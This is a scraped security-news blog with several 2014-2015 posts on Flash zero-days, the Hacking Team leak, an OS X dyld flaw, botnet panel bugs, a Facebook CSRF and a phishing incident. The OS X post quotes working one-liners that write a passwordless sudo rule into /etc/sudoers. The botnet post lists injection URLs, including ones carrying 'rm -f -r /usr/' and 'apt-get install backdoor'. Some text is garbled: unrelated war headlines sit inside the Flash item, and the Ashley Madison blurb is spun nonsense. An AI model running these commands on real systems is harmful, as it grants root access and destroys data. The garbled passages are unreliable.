Another Zero Day Vulnerability Found In Adobe Flash

Another "Zero Day" Vulnerability Found In Adobe Flash

The researchers of TrendMicro found Zero day exploit in Adobe Flash Plugin. The Flash zero-day affects at latest version of Adobe Flash Player versions 19.0.0.185 and 19.0.0.207.

According to research Pawn Storm campaign are behind this attack said Trend Micro and they are targeting by sending Phishing Emails with attached exploit links. Suicide car bomb targets NATO troop convoy Kabul” said TrendMicro

“Syrian troops make gains as Putin defends air strikes”

“Israel launches airstrikes on targets in Gaza”

“Russia warns of response to reported US nuke buildup in Turkey, Europe”

“US military reports 75 US-trained rebels return Syria”

Adobe Affected Version by TrendMicro

How Can we Protect?

How to patch flash 0-day: 1) Uninstall flash 2) You don't need flash 3) Stop installing flash

— MalwareTech (@MalwareTechBlog) October 13, 2015

TrendMicro said that they sent report to Adobe. But still Adobe does not patched this vulnerability.

Read more

by Malik korrich ~ mercredi 14 octobre 2015 0 commentaires

Organizations Need To Be More Concerned About Their Security

Organizations Need To Be More Concerned About Their Security.

Nothing is secure! Yes, you heard it right. Today we point of some recent hacks.

From a top range of cars to high potential planes, all have been found vulnerable many times.

SuperCar Tesla S gets Vulnerable

Starting from the recent hack of Tesla Model S car, two researchers have found a vulnerability in the internal network of Tesla’s dashboard and it was successfully penetrated with the help of software command and they could even plant a trojan into the Model S’ network and remotely disconnect its engine from the dashboard.

America Airlines And Sabre Systems

Now the same thing happened with the American Airlines too, Chinese Hackers have breached the American Airlines and Sabre Systems and got access to hundreds of airlines reservations and thousands of hotel’s data but evidence have not been found yet.

Security Breach In Pentagon Computers

Another big breach was Pentagon Access, Russian Hackers got access to Pentagon email systems and affected 4,000 Joint Chief’s of Staff Personnel (both military and civilian) and now the system has been shutdown for around two weeks.

Skateboards Also Compromised

And not only this but your Skateboards are also being compromised. Recently, two security researchers Healey and Mike Ryan developed an exploit called FacePlant which can seize the device and take over the control of electric Skateboards and they have also presented their findings in DEFCON Conference held at Las Vegas.

Ashley Madison Dating Website Hacked
Ashley Madison Website Hacked: Hackers Want To Release 37 Million Users Data. Ashley Madison is and undertaking site to the online personals & dating destination for easygoing experiences, wedded dating, attentive experiences and extramarital issues. 

Hacking Team Got Hacked
Italian Surveillance Company "HackingTeam" Got Hacked, 400GBs Data Leaked Online! An Italian company that sells spying tools to government and law enforcement agencies has been hacked with 400GB data of internal documents, source code and emails. -

Read more

by Malik korrich ~ lundi 10 août 2015 0 commentaires

KdExploitMe: A Kernel Driver To Practice Writing Exploits

KdExploitMe: A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.

The intent of this driver is to educate security testers on how memory corruption issues in Windows kernel drivers can be exploited. 

Knowing how to exploit security issues allows security testers to prove that bugs are exploitable which can be used to convince developers to fix bugs. While these techniques can be used for evil, this driver in the hopes that you will use this knowledge for good.

Download

Read more

by Malik korrich ~ jeudi 6 août 2015 0 commentaires

Microsoft Announced To Increase the Bug Bounty Rewards Upto $100,000

Microsoft Announced To Increase the Bug bounty Rewards Up-to $100,000.

Good news for Bug Hunters!

On Wednesday, Microsoft Announced To Increase the Bug bounty Rewards at BlackHat USA conference 2015. Microsoft also running a contest at Black Hat in Las Vegas, 5-6 August 2015.


Raising the Bounty for Defense from $50,000 USD to $100,000 USD

• Brings defense up on par with offense
• Rewards the novel defender equally for their research

This continued evolution includes a new approach to the Online Services Bug Bounty Program:

Authentication vulnerabilities will receive double bounty payouts

• Microsoft Account (MSA) and Azure Active Directory (AAD) vulnerabilities
• Bonus period will run from August 5, 2015 - October 5, 2015
• All payouts during this period will receive twice the normal payout (that means we will pay $30,000 USD for a great Authentication vulnerability!)

MSA contest at Black Hat

• Come show us your 1337 skills and win an Xbox One, Surface 3, or one year of full MSDN access.
• Come visit us at the Microsoft Networking Lounge, August 5-6, in Mandalay Bay to review full rules and to participate.

RemoteApp

• RemoteApp lets users run Windows apps hosted in Azure anywhere, and on a variety of devices.
• RemoteApp is being added as a new property of the Online Services Bug Bounty Program and all of the regular terms and payout rules apply.

Few days ago Microsoft Fixed Windows 10 Bugs After Official Released


Source: Microsoft 

Read more

by Malik korrich ~ 0 commentaires

Smashing The Browser: From Vulnerability Discovery To Exploit Development

Smashing The Browser: From Vulnerability Discovery To Exploit Development.

Part 1: Browser Fuzzing Technology

This part will first introduce a fuzzer framework (StateFuzzer) developed by myself as well as the fuzzing strategies behind it. Then conclude some effective fuzzing ideas and related vulnerabilities based on results of the fuzzer.

Part 2: Advance Browser Exploitation Techniques

This part will first brief introduce the security model of modern browsers as well as the combat between exploit and mitigation. Then introduce all kinds of heap management mechanisms and their defects together with some exploit-friendly data structures of Google Chrome and IE 11. After that, analyze the advance exploit technologies of these two browsers, including two new exploitation techniques, one of which is not limited by sandbox (Demo). Finally conclude the dilemmas of Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP) and Sandbox.

Part 3: IE 11 0day Exploit Development

After taking one of my IE 11 UAF vulnerabilities from StateFuzzer, I will share the whole exploit developing experience from the vulnerability trigger to arbitrary code execution, together with all related technologies and skills (Demo).

At last, I will bring a special, interesting and undisclosed IE 11 0day (not affected by isolated heap and protected free).

Download

Read more

by Malik korrich ~ samedi 25 juillet 2015 0 commentaires

Security Hole in Apple OS X Privilege Escalation Bug Found

Security Hole in Apple OS X, Privilege Escalation Bug Found By Security Researcher Stephan Esser.

Esser said the vulnerability is present in both the current 10.10.4 (Yosemite) version of OS X and the current beta version of 10.10.5. 

Significantly, the present beta variant of 10.11 is free of the flaw, an evidence that Apple designers might as of now aware of the vulnerability. It wouldn't be astounding for the fix to discover its way into an incremental redesign to OS X released in the coming weeks.

Its the type of security hole attackers regularly exploit to bypass security protections built into modern operating systems and applications.

Esser explained in the blog post,

When Apple changed the dynamic linker code for OS X 10.10 to support the new DYLD_PRINT_TO_FILE environment variable they added the following code directly to the _main function of dyld. As you can see from this code the value of the environment variable is directly used as filename for the opened or created logging file.

const char* loggingPath = _simple_getenv(envp, "DYLD_PRINT_TO_FILE");
if ( loggingPath != NULL ) {
        int fd = open(loggingPath, O_WRONLY | O_CREAT | O_APPEND, 0644);
        if ( fd != -1 ) {
                sLogfile = fd;
                sLogToFile = true;
        }
        else {
                dyld::log("dyld: could not open DYLD_PRINT_TO_FILE='%s', errno=%d\n", loggingPath, errno);
        }
}


The problem with this code is that it does not come with any safeguards that are required when adding new environment variables to the dynamic linker. Normally for security reasons the dynamic linker should reject all environment variables passed to it in case of restricted files. This is automatically handled when new environment variables are added to the process DyldEnvironmentVariable() function. However in the DYLD_PRINT_TO_FILE case the code was directly added to the _main function of dyld.

Notwithstanding that it includes a relief against a typical trap to evade O_APPEND limitations on document descriptors.

How can we protect?

Before going into the exploitation of this problem please be reminded that because it will likely take months for Apple to react to this issue we released a kernel extension that protects from this vulnerability by stopping all DYLD_ environment variables form being recognized by the dynamic linker for SUID root binaries. In addition to that it adds a mitigation against a common trick to circumvent O_APPEND restrictions on file descriptors.

Essar tweeted:

echo python -c '"import os;os.write(3,\"ALL ALL=(ALL) NOPASSWD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo su # via reddit lsdhobo

— Stefan Esser (@i0n1c) July 22, 2015

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s # via reddit: numinit (shorter)

— Stefan Esser (@i0n1c) July 22, 2015

If you want to fix this vulnerability before apple new update then here you can. Security researcher Esser explained to fix this vulnerability on GitHub.

SUIDGuard - A kernel extension adding mitigations to protect SUID/SGID binaries

SUIDGuard is a TrustedBSD kernel driver that implements several mitigations to protects against weaknesses usually involving SUID/SGID binaries.

• Protects SUID/SGID root binaries from DYLD_ environment variables by overwriting the string DYLD_ with XYLD_
• Protects the O_APPEND flag usually used when opening e.g. logfiles from being disabled by someone with credentials that are different from those used to open the file
• Tested with OS X Yosemite 10.10.4.

Download

Read more

by Malik korrich ~ jeudi 23 juillet 2015 0 commentaires

Firefox Blocks Adobe Flash Player Plugin Due To Unpatched 3rd Zero Day Vulnerability

Firefox Blocks Adobe Flash Player Plugin Due To Unpatched 3rd Zero Day Vulnerability.

Some of the places user didn't see the videos due to block. Exploits for these vulnerabilities were found in the information taken from HackingTeam in the assault revealed a week ago.

Adobe expected to patch these flash Zero days in this week, but at the meantime Adobe disabled all versions of plugin.

Adobe released 18.0.0.209 update version for flash player plugin today

In the Mozilla Statement,
"All versions of Adobe’s Flash Player plugin are currently deactivated by default, until Adobe releases an updated version to address known critical security issues."

Last week we reported Hacking Team was hacked and 400GBs Data Leaked. These zero days comes out from these leaks.

Firefox officially Tweeted,

We are committed to protecting our users from security risks. That's why–following an Adobe alert–we temporarily blocked #Flash in Firefox.

— Firefox (@firefox) July 14, 2015

New Facebook Chief Security Officer (CSO) Alex Stamos tweeted,

It is time for Adobe to announce the end-of-life date for Flash and to ask the browsers to set killbits on the same day.

— Alex Stamos (@alexstamos) July 12, 2015

In the Statement of Adobe,

"Security Advisory for Adobe Flash Player
Release date: July 10, 2015

Last Updated: July 12, 2015
Vulnerability identifier: APSA15-04

CVE number: CVE-2015-5122, CVE-2015-5123

Platform: Windows, Macintosh and Linux

Summary:
Critical vulnerabilities (CVE-2015-5122, CVE-2015-5123) have been identified in Adobe Flash Player 18.0.0.204 and earlier versions for Windows, Macintosh and Linux. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.  

Adobe is aware of reports that exploits targeting these vulnerabilities have been published publicly. Adobe expects to make updates available during the week of July 12, 2015."

By playing any flash content in Firefox, top of the browser windows can read 

"Firefox has presented the unsafe plugin 'Adobe Flash' from running on the target URL."

Read more

by Malik korrich ~ mardi 14 juillet 2015 0 commentaires

Italian Surveillance Company "HackingTeam" Gets Hacked, 400GBs Data Leaked Online

Italian Surveillance Company "HackingTeam" Gets Hacked, 400GBs Data Leaked Online!

An Italian company which sells spying tools to government and law enforcement agencies has been hacked with 400GB data of internal documents, source code and emails.

Hacking Team is one of the most private companies in the world which sells powerful surveillance tools across the world to the Law Enforcement and Government Intelligence Agencies.

Yesterday their internal network had been breached with 400GBs of data have been compromised and distributed publically on torrents and file sharing sites.

Despite their previous denials of exposing this precious data to companies, they sold their data and tools to countries like Egypt, Ethiopia, Morocco, Nigeria, Sudan, Chile, Colombia, Ecuador, Honduras, Mexico, Panama, United States, Azerbaijan, Kazakhstan, Malaysia, Mongolia, Singapore, South Korea, Thailand, Uzbekistan, Vietnam, Australia, Cyprus, Czech Republic, Germany, Hungary.

This attack was performed by some unknown hackers who exposed their internal private documents on various file sharing sites as well as they replaced the logo of Hacking Team’s twitter account to “Hacked Team” and currently tweeted with images of compromised data.

Since we have nothing to hide, we're publishing all our e-mails, files, and source code https://t.co/dCBZAPTtpDhttps://t.co/Frr1ut01o5

— Hacked Team (@hackingteam) July 6, 2015

Of course not, it's a chance to upsell! They need to pay us for training so they learn not to get detected. pic.twitter.com/QoWU1zf1Kc

— Hacked Team (@hackingteam) July 6, 2015

Regarding this breach, one of the employees of Hacking Team, Christian Pozzi has responded on twitter :

We are currently working closely with the police at the moment. I can't comment about the recent breach.

— Christian Pozzi (@christian_pozzi) July 6, 2015

#Update now: 
1. @HackingTeam account restored & @christian_pozzi account deleted.

2. Hacking Team Website Offline:

"503 Service Temporarily Unavailable"

Read more

by Malik korrich ~ lundi 6 juillet 2015 0 commentaires

WordPress Patched Zero Day XSS Vulnerability With New 4.2.1 Security Release

WordPress Patched Zero Day XSS Vulnerability With New 4.2.1 Security Release.

WordPress 4.2.1 version is now available. This is a critical security release for all previous versions and we strongly encourage you to update your sites immediately.

A few hours ago, the WordPress team was made aware of a cross-site scripting vulnerability, which could enable commenters to compromise a site. The vulnerability was discovered by Jouko Pynnönen.

WordPress 4.2.1 has begun to roll out as an automatic background update, for sites that support those.

For more information, see the release notes or consult the list of changes.

Download WordPress 4.2.1 or venture over to Dashboard → Updates and simply click “Update Now”.

What is Cross Site Scripting (XSS)?
'XSS' also known as 'CSS' - Cross Site Scripting. It is a very common vulnerability
found in Web Applications, 'XSS' allows the attacker to INSERT malicous code, There are many types of XSS attacks.

Read more here about Cross Site Scripting with Example.

WordPress clients can likewise briefly disable remarks meanwhile until the patch has been issued by the WordPress security group.

Source: Wordpress

Read more

by Malik korrich ~ lundi 27 avril 2015 0 commentaires

Oops Google Chrome Tab Can Crash By Simple 13 Characters On MAC OS

Oops! Google Chrome Tab Can Crash By Simple 13 Characters On MAC OS

Windows, Safari and Android browsers are safe by this characters (appear to be in Assyrian). If your Chrome is crashing, just type chrome://crashes into your location bar and press Enter to view the list of crashes.


What steps will reproduce the problem?
1. Any page with

will crash the chrome tab on a Mac.

2. Just create any dummy page with the unicode characters, and the Mac Chrome tab will crash hard

What is the expected result?
Expect it not to crash

What happens instead?
It crashes

Bug reporter said,
"This is pretty serious. You could imagine someone spamming this message in hangouts/gmail and just straight-up force crashing all Mac Chrome browsers. Someone could post this on Facebook, and force-crash all Mac Chrome browers that saw it."

You can check Bug details here.

Warning: Open it as your own risk. If you are using chrome on Mac, then it might be crashed.

This Bug is not fixed yet. We hope Google will be fixed this bug by next update.

Read more

by Malik korrich ~ dimanche 22 mars 2015 0 commentaires

Exploit - Several Botnet(s) Vulnerabilities

Exploit - Several Botnet(s) Vulnerabilities!

BotNets are Mainly Created by Great Scripters, but some of them really LACK on Security!
A recent report made to siph0n.in by abdilo and asterea (@4sterea) identified How Un-Secure the Most Recent Botnets are!

Let's give a look into it!

(1) BotNet is Vulnerable to Sh3ll Upload Vulnerability


iBanking
=============

Type: Shell Upload

Sh3ll: *(2)


(18) BotNets are VULNERABLE to SQL Injection:


 Random panel
==========

Type: SQLi
Vuln: http://site.com/g.php?id=1


 Athena
==========

Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now


Casinoloader
==========

Type: SQLi
Vuln: http://localhost/gateway.php

POSTDATA page=1&val=1


 Citadel
==========

Type: SQLi
Vuln: http://localhost/cp.php?bots=1


 DLOADER
=============

Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1              
Vuln2: http://localhost/includes/update_url.php?fid=1


HERPES
=============

SQL injection.

http://localhost/tasks.php POST: vote=1&submitted=1


JACKPOS
=============

blindsqli after you login, pretty useless so i wont bother.


JHTTP
=============

Some sqlinjection vulnerabilities past the assets folder.


SAKURA
=============

Type: SQLi

http://localhost/func.php?showtopic=2 http://localhost/index.php?showtopic=322 http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312 http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10 http://localhost/showthread.php?t=123 http://localhost/showthread.php?t=23&cmd=32

Type: SQLi - POST

http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123 http://localhost/sakuraadmin44.php?threads=21 POST: snick=1


SILENCE WINLOCKER V5.0
=================

SQL injection.

http://localhost/forma.php?pin=4322 http://localhost/index.php?x=1&act=delete&id=1 http://localhost/picture.php?pin=8787 http://localhost/tmp/get.php?pin=1334


SMOKE LOADER
=============

Type: SQLi

http://localhost/control.php?id=1 http://localhost/guest.php?id=1

POST


SOLARBOT
=============

SQL injection.

localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD


SPY-EYE
=============

Type: SQLi

http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998


TINBA
=============

Type: SQLi

\tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: bot_uid=1&botcomment=mate


UMBRA
=============

Type: SQLi

Vuln: http://localhost/delete_command.php?deleteID=1


VERTEXNET
=============

There are sqlinjection vulnerabilities but the likely hood of you actually finding a way of exploiting them is low.


ZEUS AND ZEUS EVO
=============

Type: SQLi

Vuln: http://localhost/gate.php?ip=8.8.8.8


ZSKIMMER
=============

Type: SQLi

Vuln: http://localhost/process.php?xy=2


(3) BotNets are VULNERABLE to Cross-Site Scripting Vulnerability and Other Medium Issues:


CYTHOSIA BOTNET
=============

Type: Stored XSS and iFrame redirect

Click add task Command: IFRAME SRC="whateverekorlemonpartyorwhatnot.com" /IFRAME 

Then Click Create Task Finally click Tasks. VOILA!

(Credits to asterea for finding this botnet panel)


CRIMEPACK 3.1.3
============

Secure shit, like no XSS's or anything.


PLASMA
=============

Some Cross site scripting vulns and nothing else so no use telling you about them.

Furthermore they have also identified (5) Secure Sh3lls :-)

Here you all can find the Secure Ones!


 Alin1
==========

Nothing, unless logged in.


 Betabot
==========

Nope.


 CRIMEPACK 3.1.3
============

Secure shit, like no XSS's or anything.


SMSBOT
=============

nothing interesting.


SPY POSCARDSTEALER
=============

nope its secure.

------------------------------------------------------------------------------

If you all find any new Vulnerability, you can directly contact them below!

Contact: asterea@exploit.im                          

Twitter: 4sterea

------------------------------------------------------------------------------

(*)1 Source:

https://siph0n.in/exploits.php?id=3528

(*)2 iBanking Sh3ll:

http://pastebin.com/Dfczctfv


About the Author :
Christian Galeone is a Cyber Security Researcher from Italy, he's currently studying to ITCL Marco Polo ( Vocational Technical Institute | Vo-Tech ) attending the IT Programming Class. 
He has been Acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc. He is currently working with HOC as author of Cyber Security & Critical Tools Research Articles.

Read more

by Malik korrich ~ lundi 2 février 2015 0 commentaires

Facebook Vulnerability Allows to Video-Call Mark Zuckerberg!

Facebook Vulnerability Allows to Video-Call Mark Zuckerberg!

Have you ever desired to Video-Call the Founder of Facebook?
Well, with this Vulnerability it's still possible!.

The following used vulnerability allows with a GET (In-URI) CSRF Parameter to avoid the Video-Calling blocks into Mark Zuckerberg Privacy Setting's.

.First let me introduce what a CSRF Vulnerability IS:

"A Cross-Site Request Forgery (CSRF) Vulnerability is a type of attack that occurs when a malicious Web site, email, blog, instant message, or program causes a user?s Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated." (*)

Now, Let's start analyzing it!
First we start from this URL (like we are actually Video-Calling one of our Friends):

https://www.facebook.com/videocall/incall/

When we've identified the Vulnerable GET Parameter, we may apply it as below!

https://www.facebook.com/videocall/incall/?peer_id=

After the peer_id= parameter, we'll insert Mark Zuckerberg ID (which is id=4)

So, definitely, the Complete URL, will look like this below:

https://www.facebook.com/videocall/incall/?peer_id=4

Regarding this Bug, Facebook Security Team have not yet released a FIX, on the fact continuing to allow Attackers to use this flaw against the whole Social Community!.

Reference: OWASP CSRF Guide
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet


About the Author :
Christian Galeone is a Cyber Security Researcher from Italy, he's currently studying to ITCL Marco Polo ( Vocational Technical Institute | Vo-Tech ) attending the IT Programming Class.
He has been Acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc. He is currently working with HOC as author of Cyber Security & Critical Tools Research Articles.

Read more

by Malik korrich ~ dimanche 11 janvier 2015 0 commentaires

Real Life Phishing Scenario : Zero Day google bug

A reader on my blog tried to hack my account

Now all this time I've been teaching people how to hack Wireless networks, Windows machines, Websites and Social Networking accounts. All this we did in Kali Linux. For once, I'm moving away from the operating system and narrating a real life incidence of how someone almost got my Email account and password, and could have possibly infected me with a RAT (remote administration tool). He didn't really mean to hack my account, but was rather interested in making a point. So this is how it happened.

How it started

Everyday, I check my blogger dashboard to see if there are any new comments on my blog. Today morning, I saw an anonymous comment (most of the comments are anonymous so that didn't alarm me) saying that the person needed my help with something but would only contact me via mail. I couldn't give him my personal mail address so I decided to use my website's mail instead, and sent him a message. This was his reply

Looked fair enough. Out of curiosity I clicked the link and it took me to a google drive login page. Everything looked pretty convincing, and I could have easily entered my credentials into the login form, if it were not for the slightly suspicious URL. Also, it was https and chrome verified the digital certificates to be that of google. Faking this can be assumed to be next to be impossible. However, I still was cautious, considering that I run a hacking blog and it's not unlikely that a person visiting here might be good, maybe million times better than me.

What I did

So, I decided, I cannot just dismiss the page as phishing as such without trying. So I entered the email:abcd@gmail.com and password:lookslikephishing and pressed sign in. Now if it were a real page, it would have said incorrect password, but this page had no mechanism for verifying the form data, it actually just kept logging everything (i.e. it recorded whatever someone entered in the form) and would simply download the PDF no matter what we entered in the form. So, after entering the bogus login data, the PDF download started. It completed successfully and I ran the PDF. The content looked genuine and then I realized, well, what if this was a 2 fold attack, first phishing, followed by infection. He could have used a FUD remote administration tool which my antivirus wouldn't be able to detect. I have Windows Defender on my Windows 8 machine, but with proper crypting , anti-viruses can be evaded. So after this, I went to white hat section of hackforums and asked for help (everyone needs help at some time or the other, and I suck at forensics and related stuff) . An expert analyzed my computer thoroughly via teamviewer, and the file was clean indeed. Meanwhile, the following mails had been sent to me.

Mails Recieved

He sent me some mails

He knew I found out the phishing page thing

He said he wants me to spread public awareness regarding this kind of phishing

I replied to him saying that I'm finding out and cleaning the malware he sent me (if any). He replied and said he didn't send any malware or anything.

Finally

 I contacted him via FB. He turned out to be a fellow Indian and was even younger than me (I'm 17 he is 16). By this time I had finished my investigation, and the White hat expert from Hackforums didn't find anything either. I finally concluded that either there is no malware, or he's just too good. Latter is quite unlikely since he was not able to dig up my personal email address on his own. Believe me that's really easy to do. After having a conversation with him and doing some research on this HTTPS phishing page, I realized that it is done using a bug in Google drive, which has been discussed on The Hacker News. I will see if I can replicate a HTTPS phishing website using this bug, and post a tutorial on how to do it. The sole intent of this post is to make people aware that Phishing is a real threat, and to encourage Google to fix this bug soon. Either ways, they will surely patch this bug after I write the tutorial on creating a Phishing page using Google Drive, as Google won't want it's user's accounts to be compromised by any random kid with  a laptop who ended up on this website. Already they have applied a patch which makes carrying this out difficult and during the earlier days of this vulnerability, the URL was short and not suspicious at all, but now it's very long (see the screenshots). Update : Google is probably not going to do anything about the issue as it is not a bug and I'm not gonna take the risk of writing anything which will usher upon me the wrath of Google (as I use blogger for hosting and blogger is owned by google). Google Drive, just like Dropbox allows hosting simple HTML sites like this phishing one. This can be abused, since some people will not know that this is a malicious document uploaded by someone and not a legit Google Drive login page, but it still is not a bug. 

Hacker's message on FB

After I told the hacker on Facebook about this post even he acknowledged that everything about this attack is perfect but the URL which earlier used to start with google drive now has a long suspicious prefix. The vulnerability has been half patched and google will possibly patch the remaining thing soon.

Read more

by Malik korrich ~ vendredi 20 juin 2014 0 commentaires